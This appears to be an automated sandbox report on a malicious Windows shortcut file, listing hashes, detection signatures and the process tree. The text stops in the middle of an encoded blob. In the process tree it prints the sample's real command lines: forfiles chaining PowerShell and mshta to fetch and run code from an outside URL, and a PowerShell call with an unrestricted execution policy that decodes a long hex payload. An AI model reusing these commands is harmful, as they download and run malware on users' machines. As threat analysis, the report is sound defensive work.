Edit tour
Windows
Analysis Report
R8CAg00Db8.lnk
Overview
General Information
Sample name: | R8CAg00Db8.lnkrenamed because original name is a hash value |
Original sample name: | cdbfcc4d882ca6b35d7429cebc384245.lnk |
Analysis ID: | 1577880 |
MD5: | cdbfcc4d882ca6b35d7429cebc384245 |
SHA1: | ef60efe666dc9eee33d4f847dde57aba34e78bd6 |
SHA256: | 245641a41fbc20b6ff8e1b199ac9af9a103d6e9215e352f3f9e3aedec889b9e4 |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 2108 cmdline:
"C:\Window s\System32 \forfiles. exe" /p C: \Windows\S ystem32 /m cmmon32.e xe /c "pow ershell . \*i*\*2\ms h*e https: //tiffany- careers.co m/ghep1 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) - conhost.exe (PID: 3852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3620 cmdline:
. \*i*\*2\ msh*e http s://tiffan y-careers. com/ghep1 MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 4412 cmdline:
"C:\Window s\System32 \mshta.exe " https:// tiffany-ca reers.com/ ghep1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 1260 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction clea n ($vuOOVE uV){return -split ($ vuOOVEuV - replace '. .', '0x$& ')};$ernnE W = clean( '4C4392ECE 516D550361 614F1B8641 852253A5A9 044A308574 B9B1D67D2A A2493F7633 85A53C21C9 62D73AF7A3 A1A7644FEF 103968D9CE 4BE22CDCF4 C9AAAA0D11 56C1042714 327D0DF955 9DCEF92D95 2D1FED7FD4 4F342E9497 0DDD5132E3 0A64E35E47 51324A276E 21D098222A 9D80B841DC 7508B47242 C8DE36693A 37A446E453 37CE1895E8 82872A68C1 B8DC77B41F AE1F5DE0A8 934D3A20E1 97DA6F27C6 B095CECC86 6561B5408D 27B35AD836 E83E5CFCA3 209303BBA9 73A0E0D9CD 3E9998D23C 90BFE13CC4 BEFAE3250C E0200F86C9 6B61BB66F1 2DDB70731B 13C3A28A95 5F482A02B3 2FF9A15DA1 ECFBBBF793 CC72EDB34A 5A987FF46C 0D61D6E31A 789B13290E B3AD9E6625 12ADC0281C 570BCCF120 79609337C2 B50C6FF3BD 620E71911E 95424327F3 29EB0DC1C6 F5355D6B9A 0C38A95701 B7EFFFD379 2E6A3BF2C0 9DFC231E80 6D1546112A 4E3CA8C984 F0E37455D4 A9B1BF0716 8B9D0A2AA9 CFED23A362 01580A871C A7A00A0FF1 092079C043 208CA9D5FB 2B2CD7B9D7 8A4DB3176B 4A187FC2B0 A69302794F 7EF5CF7B38 EA290D6A3F D0FED4D1A7 CFA6F9F2AB EB4968B377 32EBE6F7B5 D433925FCC 54BCF9F075 1476C4A1F7 381FCAB820 7125C23DF8 455AB2E13D 85EB368A16 19B06BF2DA 9EAAD111EF B8AEEDDEFD 41D80A2327 1E7E72E7A5 905A7C4F3C F522315763 C528146A5D 8861258033 777A0C5EBD 195000561C 965AA4AC7B 18EAD7327C E25B8624E9 27D2D5D7FD DC36C21B97 72937ED991 F17813F0F3 A8422D3AF2 78FAD8A504 D97390558B 4C0E09B3F0 AFAEB83FF0 ED68659D2D 0133F372F5 CCA602FCFC 65D5B169F7 EFD754CC9B 688D559092 6DABC2E7CF 00A4B3C64F 8492DDBC72 D696028CEA 4EF1497C99 51F051DD47 FBA7AA633A E4216D74BB 6544091543 B7A4C88AA7 D744907025 9AA42EF740 61F08CAEB6 D24698FD62 B73C9B854E F540BE2BC1 197A260BC8 EFAC5EB1F6 6809412345 727AAA19E0 0AA6AB2B0A E4E8E2214D 612DCF3CC1 87893D8E4E FA843640E5 F762AF2463 9A3DA6573B CBFAAD965B 1008B1DA57 62FE0C1DEE 2B3BC73609 EABEB3867D 7830D8FF38 6594BAC138 E1F2B5BF3E 19010CCEB4 1ED303E01E 3AC4371CCB 141E9B798E C90619F093 0690897751 682C457CE9 5E208E0D89 FCFA0C3A2F 215F55C4AF A67942C796 9C7EC45757 A3F2B84320 1BA5896CE0 84ECF02990 2929420A5A 605DCAE06D 0E20817E54 A84154B910 E2A7E99DCE 88C63234F5 3567ECD466 A94DB5A936 652CFB9B2A 1733BB0033 7D0AD33994 4F80BA2AFF F40DFE5A06 7255BCBBA6 FDD8FDF885 7B0D56E86B 756F7C329B 1C464F9520 3B87123A10 F7826ED9D3 2686CD3720 31EB990E0F 919E47B555 1BDA69E3DE 02837FD758 20E2A01F6A 7D0AC1F71A 9F7457ADE2 919759EEA4 F517ADD7A9 83D85B4AB3 F976B6B347 C72A9F8CE4 E17746B79C 374BCF7DA5 67F5D61930 36C3A9147B FBF55BD546 59FD8DD570 2914E8D495 DF4376BC0D 1E4380DFAE DE844E8193 63C215834E 1E687ABC85 4482303E7F 2A9138B86E A3385D31DA 2D6CFAF1C4 7A1284645A 362744A4C2 705A1D4B91 63FD1BFB07 A0A75F1E0D B2117DE25D EDCE342075